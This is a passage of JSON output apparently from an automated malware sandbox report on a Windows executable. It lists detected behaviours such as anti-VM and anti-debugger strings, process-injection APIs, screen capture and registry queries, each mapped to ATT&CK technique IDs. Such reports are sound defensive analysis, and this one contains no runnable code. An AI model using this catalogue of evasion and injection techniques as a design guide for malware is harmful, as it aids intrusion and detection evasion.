\"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "stream-28", "type": 1, "relevance": 5, "name": "Contains ability to lookup the windows account name", "description": "GetUserNameA@ADVAPI32.DLL at 00000000-00004288-37135-77-00407114", "origin": "Hybrid Analysis Technology", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify sandbox environment running process\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: The input sample contains a known anti-VM trick\n Matched sigs: Contains ability to delay the execution of current thread\n Matched sigs: YARA signature match - References common sandbox DLLs (sandbox evasion)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp, 00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-138", "type": 2, "relevance": 2, "name": "Contains ability to use Cryptographic classes", "description": "file/memory contains long string with (Indicator: \"Aes\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n file/memory contains long string with (Indicator: \"Oid\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n file/memory contains long string with (Indicator: \"RC2\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-439", "type": 2, "relevance": 1, "name": "Contains ability to modify process memory (API string)", "description": "Found reference to API \"VirtualAllocEx\" (Indicator: \"VirtualAllocEx\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"VirtualAllocEx\" (Indicator: \"VirtualAllocEx\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"MsgWaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"MsgWaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-79", "type": 2, "relevance": 1, "name": "Contains ability to create a remote thread (API string)", "description": "Found reference to API \"CreateRemoteThread\" (Indicator: \"CreateRemoteThread\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"CreateRemoteThread\" (Indicator: \"CreateRemoteThread\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"WriteProcessMemory\" (Indicator: \"WriteProcessMemory\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"VirtualAllocEx\" (Indicator: \"VirtualAlloc\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"VirtualAllocEx\" (Indicator: \"VirtualAllocEx\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"WriteProcessMemory\" (Indicator: \"WriteProcessMemory\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"VirtualAllocEx\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"VirtualAllocEx\" (Indicator: \"VirtualAllocEx\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-145", "type": 2, "relevance": 1, "name": "Found virtual disk drive like strings", "description": "Found string - \\\\.\\Syser; Source: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found string - \\\\.\\SyserDbgMsg; Source: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found string - \\\\.\\SyserBoot; Source: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found string - \\\\.\\SICE; Source: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found string - \\\\.\\NTICE; Source: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found string - \\\\.\\Syser; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found string - \\\\.\\SyserDbgMsg; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found string - \\\\.\\SyserBoot; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found string - \\\\.\\SICE; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found string - \\\\.\\NTICE; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "memorydump-8", "type": 20, "relevance": 1, "name": "Found PE header in memory", "description": "Found PE header \"MZ\" - Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4259976'}\" (UID: 00000000-00004288)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"FindResourceA\" with parameter \"4217440\" - (UID: 00000000-00004288)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"IsDebuggerPresent\" (Indicator: \"IsDebuggerPresent\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"UnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"BSS\" is zero\n Raw size of \".tls\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-201", "type": 2, "relevance": 1, "name": "Contains ability to query system locale (API string)", "description": "Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-666", "type": 2, "relevance": 1, "name": "Able to identify sandbox environment running process", "description": "Found string \"VBoxService.exe\" (Indicator: \"vboxservice.exe\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found string \"VBoxService.exe\" (Indicator: \"vboxservice.exe\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-413", "type": 2, "relevance": 1, "name": "Contains ability to find open windows (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-143", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system language (API string)", "description": "Found reference to API \"GetKeyboardType\" (Indicator: \"GetKeyboardType\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetKeyboardType\" (Indicator: \"GetKeyboardType\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-433", "type": 2, "relevance": 1, "name": "Contains ability to execute a WMI query", "description": "Found string \"SELECT * FROM k$\" (Indicator: \"select * from \"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004288)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-31", "type": 1, "relevance": 1, "name": "Contains ability to retrieve/open a process", "description": "OpenProcess@KERNEL32.DLL at 00000000-00004288-37135-1-004094D4", "origin": "Hybrid Analysis Technology", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "file/memory contains long string with (Indicator: \"aes\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"BitBlt\" (Indicator: \"BitBlt\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API \"GetDC\" (Indicator: \"GetDC\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetModuleFileNameExA\" (Indicator: \"GetModuleFileName\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetModuleFileNameExA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"Process32FirstW\" (Indicator: \"Process32First\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"Process32NextW\" (Indicator: \"Process32Next\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"Thread32First\" (Indicator: \"Thread32First\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"Thread32Next\" (Indicator: \"Thread32Next\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"Module32First\" (Indicator: \"Module32First\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"Module32Next\" (Indicator: \"Module32Next\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"Module32FirstW\" (Indicator: \"Module32First\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"Module32NextW\" (Indicator: \"Module32Next\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"Process32FirstW\" (Indicator: \"Process32First\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"Process32NextW\" (Indicator: \"Process32Next\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"Thread32First\" (Indicator: \"Thread32First\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"Thread32Next\" (Indicator: \"Thread32Next\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"Module32First\" (Indicator: \"Module32First\"; Source: 